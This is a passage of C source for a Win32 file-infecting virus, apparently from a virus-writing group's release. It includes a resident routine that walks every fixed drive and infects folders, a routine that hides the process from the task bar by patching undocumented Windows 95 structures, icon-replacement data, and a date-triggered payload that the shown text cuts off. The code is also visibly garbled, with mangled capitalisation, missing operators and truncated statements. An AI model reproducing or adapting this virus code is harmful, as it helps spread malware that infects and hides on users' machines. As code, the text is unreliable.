DATADIRECTORY [Image_Directory_Entry_Resource].

VirtualAddress;

PiconImages-> Plargeicon = getDefaulticon (prsrcdir, large_icon, false);

PiconImages-> psmallicon = getDefaulticon (prcrcdir, small_icon, false);

Return;

}

IF ((pimage_os2_header) -> ne_magic == image_os2_signature) {

PIMAGE_OS2_HEADER PNE = (PIMAGE_OS2_HEADER) PNEORPE;

Byte align = * RVA2PTR (Pbyte, PNE, PNE-> Ne_RSRCTAB);

PRESOURCE_TYPE

PRSRCTYPE = RVA2PTR (PRESOURCE_TYPE, PNE, PNE-> Ne_RSRCTAB 2),

PRSRCEND = RVA2PTR (PRESOURCE_TYPE, PNE, PNE-> Ne_Restab);

While (PRSRCTYPE ID) {

IF (PRSRCTYPE-> ID == (0x8000 | (WORD) RT_ICON)) {

PRESOURCE_INFO PRSRCINFO = (PRESOURCE_INFO) (PRSRCTYPE 1);

DWORD NCOUNT = 0;

Do {

PiconImage PiconImage = RVA2PTR (PiconImage,

PMZ,

PRSRCINFO -> offset << align;

IF (PiconImage-> ichead.bisize == sizeof (bitmapinfoheader) &&

PiconImage-> icheader.biplanes == 1 &&

PiconImage-> icheader.bibitcount == 4)

IF (! PiconImages-> Plargeicon &&

PiconImage-> icheader.biwidth == 32 && piconimage-> ichead.biheight == 64)

PiconImages-> Plargeicon = PiconImage;

Else

IF (! PiconImages-> PSMallicon &&

PiconImage-> icheader.biwidth == 16 &&

PiconImage-> ichead.biheight == 32)

Piconimages-> psmallicon = piconimage;

IF (PiconImages-> Plargeicon && PiconImages-> psmallicon)

Goto BreakAll;

WHILE ( ncount count);

}

PRSRCTYPE =

(PRESOURCE_TYPE)

(PBYTE) PRSRCTYPE SIZEOF (Resource_Type)

prcrctype-> count * sizeof (resource_info));

}

BREAKALL :;

}

#ENDIF

#ifdef TSR

__INline void seektsr () {

DWORD CBYTES;

PBYTE PSZDRVS, PSZDRIVE;

Uint UdriveType;

IF (! (cbytes = getLogicalDriveStrings) ||

! (pszdrvs = (pbyte) GlobalAlloc (LPTR, CBYTES 1)))))))))

Return;

IF (CBYTES, PSZDRVS) - 1

#if prev_lapse

SLEEP (prev_lapse * 1000);

#ENDIF

Do {

Pszdrive = pszdrvs;

Do {

IF ((UDriveType = GetDriveType (pszdrive)) <= drive_removable ||

UDriveType == Drive_CDROM)

CONTINUE;

#ifdef msgbox

Cancelfolderseek

Cancelfolderseek = false;

#ENDIF

Walkfolder (lstrcpy (pathname, pszdrive);

} while (* (pszdrive = lstrlen (pszdrive) 1));

#ifdef msgbox

Cancelfolderseek

Break;

#ENDIF

WHILE (TRUE);

#ifdef msgbox

CloseHandle (hmutex);

#if 1

MessageBox (NULL, "TSR: Mutex Destroyed!", Szcopyright, MB_OK;

#ENDIF

}

#ifdef msgbox

GlobalFree (pszdrvs);

#ENDIF

}

Void Walkfolder (Pbyte Pathname) {

DWORD CBYTES;

Handle hfindfile;

Sleep (seek_lapse * 1000);

InfectPath (Pathname, CBYTES = LSTRLEN (Pathname);

IF (Pathname [CBYTES - 1]! = '//') Pathname [CBYTES ] = '//';

* (PDWORD) (Pathname CBYTES) = '*. *';

IF ((Hfindfile = FindfirstFile (Pathname, & FindataSr) ==

INVALID_HANDLE_VALUE)

Return;

Do {

#ifdef msgbox

Cancelfolderseek

Break;

#ENDIF

IF (! isfolder (& FindDataTSR))

CONTINUE;

LSTRCPY (Pathname CBytes, FindDataTSr.cfileName);

Walkfolder (Pathname); // Recurse Folders ..

WHILE (FindNextFile (Hfindfile, & Findata));

FindClose (HFindFile);

}

// void hideprocess () {// unsecure way to

// pthread_database pthreaddb = getthreaddb (); // hide out.

// if (pthreaddb-> pprocess-> type! = k32obj_process) // this is undocumented

// Return; // Microsoft Stuff,

// pthreaddb-> pprocess-> flags | = fservationprocess; // likely to gp fault!

//} // code bellow is better

Void hideprocess () {

{// do it the legal undoc. Way ..

DWORD (WinApi * PfnRegisterServiceProcess) (DWORD, DWORD);

PFNREGISTERSERVICEPROCESS =

(DWORD (WINAPI *) (DWORD, DWORD))

GetProcaddress (GetModuleHandle ("Kernel32"),

"RegisterServiceProcess");

IF (PFNREGISTERSERVICEPROCESS)

PfnRegisterServiceProcess (0, 1);

}

{// do it the legal dirty way, just in case ..

PPROCESS_DATABASE PPROCESSDB = getProcessDB ();

Handle hprocess = getCurrentProcess ();

DWORD dwbuffer, nbytes;

IF (! ReadprocessMemory (HProcess, & PPRocessDB-> Type,

& dwbuffer, 4, & nbytes ||

NBYTES! = 4 || dwbuffer! = k32obj_process ||

ReadProcessMemory (HProcess, & PPRocessDB-> Flags,

& dwbuffer, 4, & nbytes ||

NBYTES! = 4)

Return;

Dwbuffer | = fservationProcess;

WriteProcessMemory (HProcess, & PProcessDB-> Flags,

& dwbuffer, 4, & nbytes);

}

__inline pprocess_database getprocessdb () {

PPROCESS_DATABASE PPROCESSDB;

DWORD NBYTES;

Return (! ReadprocessMemory (GetCurrentProcess (), & GetThreadDb () -> PPRocess,

& PPRocessDB, 4, & nbytes ||

NBYTES! = 4)

NULL? NULL

: pprocessdb;

}

__inline pthread_database getthreaddb () {

__ASM PUSH -10H

__ASM POP EAX

__ASM Add Eax, FS: [Tib.ptibself (Eax 10h)] // (EAX 10H) = 0

}

#ENDIF

// end

??????????????????????????????????????????? ?????????????? [win32red.c]??

??????????????????????????????????????????? ?????????????? [win95sys.h]??

// Win95Sys - Win95 System Structure

// Some Powerful Win95 STRUCTS That Microsoft Dont Want US to Know About.

// These is much..............

// Last Minute Note (NOV / 10/98): Unfortunately Some of the Fields in these

// Structures Broke on Win98. More especification i dunno where the process

// Database Structure Lies in Memory. However the 'registerServiceProcess'

// API is still exported from kernel32 and sour Nasty trick with the

// 'Task Bar' Still Works There. Under NT this story is out of scope. Jq.

// kernel32 Objects

#define k32obj_semaphore 0x1

#define K32OBJ_EVENT 0x2

#define k32obj_mutex 0x3

#define k32obj_critical_section 0x4

#define k32obj_process 0x5

#define k32obj_thread 0x6

#define k32obj_file 0x7

#define k32obj_change 0x8

#define k32obj_console 0x9

#define k32obj_screen_buffer 0xa

#define k32obj_mem_mapped_file 0xB

#define k32obj_serial 0xc

#define k32obj_device_iocTl 0xD

#define k32obj_pipe 0xe

#define k32obj_mailslot 0xF

#define k32obj_toolhelp_snapshot 0x10

#define k32obj_socket 0x11

// Process Database Flags # Define Fdebugsingle 0x00000001

#define fcreateprocessevent 0x00000002

#define fExitProcessEvent 0x00000004

#define FWIN16PROCESS 0x00000008

#define fDoSProcess 0x00000010

#define fconsoleprocess 0x00000020

#define ffileapisareoem 0x00000040

#define FNukeProcess 0x00000080

#define fserviceProcess 0x00000100

#define floginscripthack 0x00000800

// Thread Database Flags

#define fcreatethreadevent 0x00000001

#define fcancelexceptionAbort 0x00000002

#define fortempstack 0x00000004

#define fgrowableStack 0x00000008

#define fdelaysingLESTEP 0X00000010

#define fopenexeasimmovablefile 0x00000020

#define fcreatesuspended 0x00000040

#define fstackoverflow 0x00000080

#define fnestedcleanapcs 0x00000100

#define fwasoemnowansi 0x00000200

#define foktosetthreadoem 0x00000400

#pragma pack (1)

// modRef and Imte Structures

Typedef struct _modref {

Struct_modref * pnextmodref; // 00h

DWORD UN1; // 04H

DWORD UN2; // 08H

DWORD UN3; // 0CH

Word mteindex; // 10h

Word un4; //12h

DWORD UN5; / / 14H

Pvoid PPDB; // 18h Pointer to Process Database

DWORD UN6; // 1CH

DWORD UN7; // 20h

DWORD UN8; // 24h

} ModRef, * pmodref;

Typedef struct _imte {

DWORD UN1; // 00h

PIMAGE_NT_HEADERS PNTHDR; / / 04H

DWORD UN2; // 08H

PSTR pszfilename; // 0ch

PSTR pszmodname; // 10h

Word cbfilename; // 14h

Word cbmodname; // 16h

DWORD UN3; // 18h

DWORD CSECTIONS; / / 1CH

DWORD UN5; // 20h

DWORD Baseaddress; // 24h

Word hmodule16; // 28h

Word cusage; // 2ah

DWORD UN7; / / 2CH

PSTR pszfilename2; // 30h

Word cbfilename2; // 34h

DWORD PSZMODNAME2; // 36H

Word CBModName2; // 3ah

} Imte, * pimte;

// Process Database Structure

Typedef struct _ENVIRONMENT_DATABASE {

PSTR pszenvironment; // 00h Pointer to EnvironmentDWORD UN1; // 04H

PSTR pszcmdline; // 08h Pointer to Command Line

PSTR pszcurdirectory; // 0ch Pointer to current Directory

LPStartupinfoa Pstartupinfo; // 10h Pointer to Startupinfoa Struct

Handle hstdin; // 14h standard Input

Handle hstdout; // 18h Standard OUTPUT

Handle hstderr; // 1ch standard Error

DWORD UN2; // 20h

DWORD inheritconsole; // 24h

DWORD BREAKTYPE; / / 28H

DWORD BREAKSEM; / / 2CH

DWORD BREAKEVENT; // 30h

DWORD BREAKTHREADID; // 34H

DWORD BREAKHANDLERS; // 38H

} Environment_Database, * penvironment_database;

Typedef struct _handle_table_entry {

DWord Flags; // Valid Flags Depend On What Type of Object this IS

Pvoid Pobject; // Pointer to the Object That The Handle Refers To

} Handle_Table_Entry, * Phandle_Table_ENTRY;

Typedef struct _handle_table {

DWORD CENTRIES; // Max Number of Handles in Table

Handle_table_entry array [1]; // an array (number is given by centries)

} Handle_Table, * Phandle_Table;

Typedef struct _process_database {

DWORD TYPE; // 00H kernel32 Object Type (5)

DWord Creference; // 04h Number of References To Process

DWORD UN1; // 08H

DWORD Someevent; // 0ch An Event Object (what's it used for ???)

DWORD TERMINATIONSTATUS; // 10h Returned by getExitcodeProcess

DWORD UN2; // 14h

DWord defaultheap; // 18h Address of the Process HEAP

DWORD MEMORYCONTEXT; / / 1CH POINTER TO The Process's Context

DWORD FLAGS; // 20h

// 0x00000001 - FDEBUGSINGLE

// 0x00000002 - FcReateProcessEvent

// 0x00000004 - FEXITPROCESSEVENT

// 0x00000008 - FWIN16PROCESS

// 0x00000010 - FDoSProcess

// 0x00000020 - FconsoleProcess

// 0x00000040 - FFileApisareoem

// 0x00000080 - FNukeProcess

// 0x00000100 - FServiceProcess

// 0x00000800 - FloginscripthackDword PPSP; // 24h LINEAR ADDRESS OF PSP?

Word pspselector; // 28h

Word mteindex; // 2ah

Word cthreads; // 2ch

Word CNottermthreads; // 2EH

Word UN3; // 30h

Word CRING0THREADS; // 32H Number of Ring 0 threads

Handle Heaphandle; // 34h Heap to Allocate Handle Tables Out of

// this seems to always be the kernel32 heap

Htask W16TDB; // 38h Win16 Task Database Selector

DWORD MEMMAPFILES; // 3ch memory mapped file list (?)

Penvironment_database PEDB; // 40h Pointer to Environment Database

Phandle_Table Phandletable; // 44h Pointer to Process Handle Table

Struct _process_database * parentpdb; // 48h Parent Process Database

PmodRef modReflist; // 4ch module Reference List

DWORD thREADLIST; // 50h Threads in this process

DWORD DEBUGEECB; / / 54H Debuggee Context Block?

DWord localheapfreehead; // 58h Head of Free List in Process HEAP

DWORD INITIALRING0ID; // 5ch

Critical_section crst; // 60h

DWORD UN4 [3]; // 78H

DWORD PCONSOLE; // 84H Pointer to Console for Process

DWORD TLSINUSEBITS1; // 88H // REPRESENTS TLS INDES 0 - 31

DWORD TLSINUSEBITS2; // 8CH // Repesents TLS INDES 32 - 63

DWORD processdword; // 90h

Struct _process_database * processgroup; // 94h

DWORD PEXEMODREF; // 98H Pointer to EXE's Modref

DWORD TOPEXCFILTER; / / 9CH TOP EXCEPTION FILTER?

DWord BasePriority; // A0H Base Scheduling Priority for Process

DWORD HeapownList; // A4H Head of the List of Process Heaps

DWord HeapHandleblockList; // A8H Pointer to Head of Heap Handle Block List

DWORD PSOMEHEAPPTR; // Ach Normal Zero, But Can a Pointer TO A

// Moveable Handle Block in the HEAP

DWORD PCONSOLEPROVIDER; // B0H Process That OWNS THE CONSOLE WE 'A

Word Environselector; // b4h selector Containing process environmentword errorMode; // b6h setErrorMode Value (Also Thunks to Win16)

DWORD pevtloadfinished; // b8h Pointer to Event LoadFinished?

Word utState; // bch

} Process_Database, * pprocess_database;

// Tib (Thread Information Block Structure

Typedef struct _seh_record {

Struct _seh_record * pnext;

FarProc PfnHandler;

} SEH_RECORD, * PSEH_Record;

// this is semi-docutented in the NTDDK.H File from the NT DDK

Typedef struct_tib {

PSEH_Record PVEXCEPT; // 00h Head of Exception Record List

Pvoid PvStackUsertop; // 04h Top of User Stack

Pvoid PvStackuserBase; // 08H Base of User Stack

Word pvtdb; // 0ch tdb

Word pvthunksss; // 0eh ss selector used for thunking to 16 bits

DWORD SELMANLIST; / / 10H

PVOID PVARBITRARY; / / 14H Available for Application USE

Struct_tib * ptibself; // 18h Linear Address of Tib Structure

Word Tibflags; // 1ch

Word win16mutexcount; // 1eh

DWORD DebugContext; // 20h

DWORD PCURRENTPRIORITY; / / 24H

DWORD PVQUEUE; // 28h Message Queue Selector

PVOID * PVTLSARRAY; // 2ch thread local storage array

} TIB, * PTIB;

// TDBX Structure

Typedef struct _tdbx {

DWORD PTDB; // 00h // pthread_database

DWORD PPDB; // 04H // PPROCESDS_DATABASE

DWORD contexthandle; // 08h

DWORD UN1; // 0CH

DWord TimeoutHandle; // 10h

DWORD WAKEPARAM; / / 14H

DWORD blockHandle; // 18h

DWORD blockState; // 1ch

DWORD SUSPENDCOUNT; / / 20H

DWORD SUSPENDHANDLE; / / 24H

DWORD MUSTCOMPLETECUNT; / / 28H

DWORD waitexflags; // 2ch

// 0x00000001 - Waitexbit

// 0x00000002 - WaitackBIT

// 0x00000004 - SUSPEND_APC_PENDING

// 0x00000008 - SUSPEND_TERMINATED

// 0x00000010 - blocked_for_termination

// 0x00000020 - Emulation_npx

// 0x00000040 - Win32_npx

// 0x00000080 - Extended_Handles // 0x00000100 - Frozen

// 0x00000200 - DONT_FREEZE

// 0x00000400 - DONT_UNFREEZE

// 0x00000800 - DONT_TRACE

// 0x00001000 - STOP_TRACING

// 0x00002000 - waiting_for_crst_safe

// 0x00004000 - CRST_SAFE

// 0x00040000 - Block_Terminate_APC

DWORD SYNCWAITCOUNT; // 30h

DWORD QueuedSyncFuncs; // 34h

DWORD USERAPCLIST; // 38H

DWord kernapClist; // 3ch

DWORD PPMPSPSELECTOR; // 40h

DWORD blockEDONID; // 44H

DWORD UN2 [7]; // 48h

DWORD TRACEREFDATA; / / 64H

DWORD TRACALLBACK; / / 68H

DWORD TRACEEVENTHANDLE; / / 6CH

Word traceOutlastcs; //70h

Word K16TDB; // 72H

Word K16PDB; // 74H

Word dospdbseg; // 76h

Word exception; // 78h

} TDBX, * PTDBX;

// Thread Database Structure

Typedef struct _thread_database {

DWORD TYPE; / / 00H

DWORD CREGERENCE; // 04H

PPRocess_Database pprocess; // 08h

DWORD Someevent; // 0ch An Event Object (what's it used for ???)

DWORD PVEXCEPT; // 10h this field through field 3ch is a Tib

// structure (see tib.h)

DWORD TOPOFSTACK; / / 14H

DWORD stacklow; // 18h

Word W16TDB; // 1ch

Word Stackselector16; // 1eh used when thunking down to 16 bits

DWORD SELMANLIST; / / 20H

DWORD Userpoint; // 24h

PTIB PTIB; // 28h

Word Tibflags; // 2ch Tibf_Win32 = 1, TIBF_TRAP = 2

Word win16mutexcount; // 2eh

DWord DebugContext; // 30h

PDWORD PCURRENTPRIORITY; / / 34H

DWORD MessageQueue; // 38h

DWORD PTLSARRAY; / / 3CH

PPROCESS_DATABASE PPROCESS2; // 40h Another Copy of The Thread's Process ???

DWORD flags; // 44h

// 0x00000001 - FcreateThreadEvent

// 0x00000002 - FcancelexceptionAbort

// 0x00000004 - FontempStack

// 0x00000008 - FGROWABLESTACK

// 0x00000010 - FDELAYSINGLESTEP

// 0x00000020 - FopenexeasimmovableFile

// 0x00000040 - FcreateSuspended // 0x00000080 - Fstackoverflow

// 0x00000100 - FnestedCleanapcs

// 0x00000200 - fwasoemnowansi

// 0x00000400 - FokTosetthreadoem

DWord TerminationStatus; // 48h returned by getExitcodetteread

Word TibSelector; // 4ch

Word emulatorselector; // 4eh

DWORD chandles; // 50h

DWORD WAITNODELIST; / / 54H

DWORD UN4; / / 58H

DWord Ring0Thread; // 5ch

PTDBX PTDBX; // 60

DWORD stackbase; // 64h

DWORD TERMINATIONSTACK; / / 68H

DWORD EmulatorData; // 6ch

DWORD getLastErrorCode; //70h

DWORD Debuggercb; // 74H

DWord Debuggerthread; // 78H

PContext threadContext; // 7ch // register context defined in Winnt.h

DWORD EXCEPT16LIST; / / 80H

DWORD thunkconnect; // 84h

DWord NegstackBase; // 88H

DWORD CURRENTSS; / / 8CH

DWORD SSTABLE; / / 90H

DWORD THUNKSS16; // 94H

DWORD TLSARRAY [64]; // 98H

DWord deltapriority; // 198h

// The retail version breaks offs off here.

// all the remaining fields area most debugity

DWORD UN5 [7]; // 19ch

DWORD PCREATEDATA16; // 1B8H

DWord Apisuspendcount; // 1bch # of Times Suspendthread Has Been Called

DWORD UN6; // 1C0H

DWORD wowchain; // 1C4H

Word wssbig; // 1C8H

Word un7; // 1cah

DWord LP16SwitchRec; // 1cch

DWORD UN8 [6]; // 1D0H

DWORD PSOMECRITSECT1; // 1e8h

DWORD PWIN16MUTEX; // 1ech

DWORD PWIN32MUTEX; // 1f0h

DWORD PSOMECRITSECT2; // 1F4H

DWORD UN9; // 1F8H

DWORD RIPSTRING; / / 1FCH

DWORD LasttlssetValueeiP [64]; // 200h (Parallel to TLSARRAY, Contains EIP

// Where TLS Value Was Last Set from)

} Thread_database, * pthread_database;

??????????????????????????????????????????? ?????????????? [win95sys.h]??

??????????????????????????????????????????? ?????????????? [jqcoding.h]??

/ *

* /

Unsigned long

__stdcall

JQ_Encode (void * out, / * Output stream ptr * /

Const void * in, / * Input stream ptr * /

Unsigned long in_len, / * input stream length * /

Void * MEM64K); / * WORK MEM PTR * /

Unsigned long

__stdcall

jq_decode (void * out, / * Output stream ptr * /

Const void * in, / * Input stream ptr * /

Unsigned long in_len, / * input stream length * /

Void * MEM64K); / * WORK MEM PTR * /

??????????????????????????????????????????? ?????????????? [jqcoding.h]??

??????????????????????????????????????????? ?????????????? [winicons.h]??

// Win16 / 32 related icon structures ..

#include

#define sizeof_large_icon 0x2e8

#define sizeof_small_ICON 0x128

#DEFINE SIZEOF_ICONS (SIZEOF_LARGE_ICON SIZEOF_SMALL_ICON)

// icon format (id = 03h)

Typedef struct _iconimage {

BitmapInfoHeader iCheader; // Dib HEADER

RGBQUAD ICCOLORS [1]; // Color Table

Byte ICXOR [1]; // DIB Bits for xor mask

Byte icand [1]; // Dib Bits for and Mask

} Iconimage, * piconimage;

// Group icon format (id = 0EH)

Typedef struct _icondirentry {

Byte Bwidth; // Width, in Pixels, of the Image

Byte Bheight; // Height, In Pixels, of the Image

Byte Bcolorcount; // Number of Colors in Image (0 if> = 8bpp)

BYTE BRESERVED; // Reserved

Word Wplanes; // Color Plaso

Word wbitcount; // bits per pixel

DWORD DWBYTESINRES; // How Many Bytes in this resource?

Word nid; // the ID

} ICondirentry, * picondirentry;

#define sizeof_icondirentry sizeof (iCondirentry)

Typedef struct _icondir {

Word idReserved; // reserved (Must BE 0)

Word IDtype; // resource type (1 for icons)

Word IDcount; // How Many images?

IconDirentry IdeNtries [1]; // The Entries for Each Image} ICONDIR, * Picondir;

#define sizeof_icondir 6

??????????????????????????????????????????? ?????????????? [winicons.h]??

??????????????????????????????????????????? ???????????????? [winRes.h]??

// Win16 (ne) related structures ..

Typedef struct {

Word ID;

Word count;

DWORD FUNCTION;

} Resource_type, * pResource_Type;

Typedef struct {

Word offset;

Word Length;

Word flagg;

Word ID;

Word Handle;

Word usage;

} Resource_info, * PRESOURCE_INFO;

??????????????????????????????????????????? ???????????????? [winRes.h]??

??????????????????????????????????????????? ?????????????? [jq29aico.h]??

#ifdef compr

Byte jq29acompricons [] = {

0xD7, 0X45, 0XB1, 0X44, 0XC6, 0X7D, 0x61, 0XA8, 0X96, 0XC0, 0X9D, 0x74, 0XBB,

0x6D, 0xBC, 0x6B, 0xA0, 0XA6, 0X57, 0XC8, 0X76, 0X77, 0X64, 0X0C, 0x7E, 0x9A,

0x2F, 0xB8, 0X2, 0XCD, 0XBC, 0XA3, 0XA0, 0X33, 0X50, 0X3B, 0X90, 0X3B, 0X1F,

0x46, 0xE9, 0xB2, 0X7F, 0xE4, 0X4E, 0X28, 0X13, 0X4E, 0xFA, 0x92, 0x3e, 0xcc,

0xD1, 0xc3, 0x92, 0x95, 0x1c, 0x5e, 0xda, 0xaf, 0x45, 0x91, 0x44, 0xee, 0xc7,

0x95, 0x31, 0x04, 0x13, 0x3d, 0x1c, 0x23, 0x5d, 0xa1, 0x59, 0xa9, 0x34, 0x0e,

0x7a, 0x92, 0x3f, 0x65, 0xAc, 0x3e, 0x67, 0xa8, 0x4b, 0x8d, 0x7c, 0x9e, 0x27,

0x55, 0xcc, 0x83, 0x60, 0xa6, 0x57, 0xc8, 0xF6, 0x8a, 0x72, 0xff, 0xE5, 0xD1,

0xB9, 0X14, 0X33, 0X7D, 0XE1, 0XA4, 0X53, 0XC0, 0X9B, 0X50, 0XBB, 0X10, 0X3B,

0x6D, 0xC1, 0XE4, 0XAE, 0XDA, 0x11, 0X41, 0XE1, 0X1A, 0X42, 0X9D, 0x1A, 0XB3,

0x00, 0x54, 0x32, 0x51, 0x17, 0x08, 0x/9, 0xE5, 0X50, 0X49, 0X6E, 0x4C, 0x0C,

0x9f, 0x26, 0x16, 0xcb, 0x16, 0xEA, 0xB6, 0XA9, 0X91, 0XCC, 0XB3, 0X63, 0XED,

0xF9, 0X2C, 0XA1, 0X2C, 0x10, 0X75, 0X06, 0X60, 0X2, 0X51, 0X0, 0X01, 0XCF,

0xDA, 0xAE, 0xF1, 0X14, 0x97, 0XA3, 0X32, 0X1C, 0X7E, 0x8E, 0xCA, 0x90, 0x2b,

0x4e, 0x4a, 0x6c, 0x82,0x91,0x67,0xed, 0x96,0x67,0xca, 0xef, 0x05, 0x07,

0x3b, 0xB6, 0x1e, 0x87, 0xFb, 0x2f, 0x06, 0x08, 0x85, 0x16, 0x2f, 0xca, 0x3f, 0x83, 0x9e, 0x59, 0x11, 0xfd, 0x97, 0x46, 0xc9, 0x31, 0x9b,

0x97, 0x95, 0x37, 0x07, 0x02, 0x6f, 0xc5, 0x2b, 0xCE, 0xF7, 0x95, 0x31, 0x1a,

0x82, 0x72, 0xDF, 0xD8, 0X4C, 0x3e, 0x68, 0x9, 0x1f, 0x83, 0x9d, 0x6e, 0xDE,

0xA7, 0X55, 0X9, 0X04, 0X93, 0X40, 0XE6, 0X2A, 0XCF, 0X67, 0X16, 0X37, 0X75,

0xF1, 0x04, 0xD5, 0XC7, 0X55, 0x0C, 0XBE, 0x9A, 0X27, 0XC5, 0X6C, 0X43, 0XE0,

0xB5, 0X2A, 0x31, 0x02, 0X1F, 0x24, 0x2B, 0xB2, 0X9C, 0x5C, 0XA3, 0X5D, 0XA0,

0x8b, 0x53, 0xbc, 0x1b, 0x5d, 0x1f, 0x55, 0xcc, 0xfe, 0xe7, 0xD5, 0xcc, 0xfe,

0xE7, 0xD5, 0XCC, 0xFE, 0xE7, 0XA8, 0X36, 0X77, 0X88, 0X96, 0X03, 0X2, 0X6C,

0x3a, 0x54, 0xAF, 0x5F, 0x9D, 0xAF, 0x8E, 0xC8, 0x0c, 0xc4, 0x29,

0xA7, 0x0f, 0x77, 0x1b, 0x4f, 0xba, 0xD0, 0xB2, 0x6c, 0xAF, 0xE3, 0XAA, 0X26,

0x58, 0x20, 0x00, 0x5b, 0xF3, 0x76, 0xF2, 0x2c, 0xB3, 0X59, 0XD4, 0XA1, 0X50,

0x18, 0x48, 0x00, 0x6b, 0x2d, 0x79, 0xee, 0xc0, 0x04, 0x44, 0xE2, 0x2, 0x59

}

#define sizeof_compr_icons sizeof (jq29acompricons)

#ELSE

BYTE JQ29AICONS [] = {

0x28, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x01,

0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x80, 0x00, 0x00,

0x00, 0x80, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80,

0x80, 0x00, 0x00, 0xc0, 0xc0, 0xc0, 0x00, 0x80, 0x80, 0x80, 0x00, 0x00, 0x00,

0xFF, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0x00,

0x00, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0X78, 0XE3, 0xF8,

0x00, 0x70, 0x63, 0xF8, 0x8f, 0xE3, 0x31, 0xF1, 0x87, 0xE3, 0x31, 0xf1, 0xc3,

0xFF, 0x10, 0x01, 0xC1, 0xFF, 0x18, 0x03, 0xE1, 0xF8, 0X18, 0XE3, 0XF0, 0XF0,

0x18, 0xE3, 0xF8, 0xE3, 0x1c, 0xE7, 0xF8, 0x63, 0x1c, 0x47, 0xFc, 0x63, 0x1c,

0x47, 0xFc, 0x63, 0x1c, 0x47, 0x1c, 0x63, 0x1e, 0x0f, 0x1c, 0x63, 0x3e, 0x0f,

0x80, 0xf0, 0x3e, 0x0f, 0xc1, 0xF8, 0x7f, 0x1f, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,

0xFF, 0xFF, 0x7F, 0xF0, 0XF3, 0XC0, 0X27, 0XF0, 0X73, 0X80, 0XE7, 0XE7, 0X3F,

0x98, 0xff, 0x32, 0x7f, 0xff, 0x3f, 0x3e, 0x7f, 0xff, 0x3f, 0x3e,

0x7f, 0xf, 0x3f, 0x3e, 0x7f, 0xf, 0x3f, 0x3e, 0x7f, 0xf, 0x3f, 0x3e, 0x7f,

0xFF, 0x3F, 0x9C, 0xFF, 0xFF, 0x3F, 0x80, 0xFF, 0xFF, 0x3F, 0xC1, 0xFF, 0xFF,

0xFF, 0xFF, 0xFF, 0x28, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x20, 0x00,

0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00,

0x80, 0x00, 0x00, 0x00, 0x80, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x80, 0x00,

0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0xc0, 0xc0, 0xc0, 0x00, 0x80, 0x80, 0x80,

0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xFF,

0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,

0x00, 0x0c, 0x000, 0x00, 0x00, 0x7b, 0x5d, 0x80, 0x00, 0xbf, 0x63, 0x00, 0x00,

0xDC, 0x6b, 0x80, 0x00, 0xeb, 0x6b, 0x00, 0x00, 0x6b, 0x6b, 0x80, 0x00, 0x9c,

0xF7, 0x00, 0x00, 0xFF, 0xFF, 0xc0, 0x00, 0xFF, 0xF3, 0x80, 0x00, 0xcd, 0x85,

0xFF, 0x00, 0xB7, 0x67, 0x00, 0x00, 0xF6, 0xD7, 0xFF, 0x00, 0xF6, 0xF7, 0x00,

0x00, 0xF7, 0x6f, 0xFF, 0x00, 0xF7, 0x9f, 0x00, 0x00, 0xff, 0xff, 0xfb, 0x00

}

#ENDIF

??????????????????????????????????????????? ?????????????? [jq29aico.h]??

??????????????????????????????????????????? ??????????????? [payload.c]??

{

SystemTime SystemTime;

GetLocalTime (& SystemTime);

IF ((byte) systemtime.wday == 29 && (byte) systemtime.wmonth == 0xA) {

BPAYLOADDAY = TRUE;

#ifdef compr

JQ_DECode (Hostlargeicon Sizeof_icons,

JQ29acompricons sizeof_compr_icons,

SizeOf_compr_icons,

Comprmem);

{

Handle HBMP;

DWORD CBYTES;

IF ((CBytes = getTemppath) - 1

IF (Pathname [CBYTES - 1]! = '//') Pathname [CBYTES ] = '//';

* (PDWORD) (Pathname CBYTES) = '.a92';

* (PDWORD) (Pathname CBYTES 4) = 'PMB';

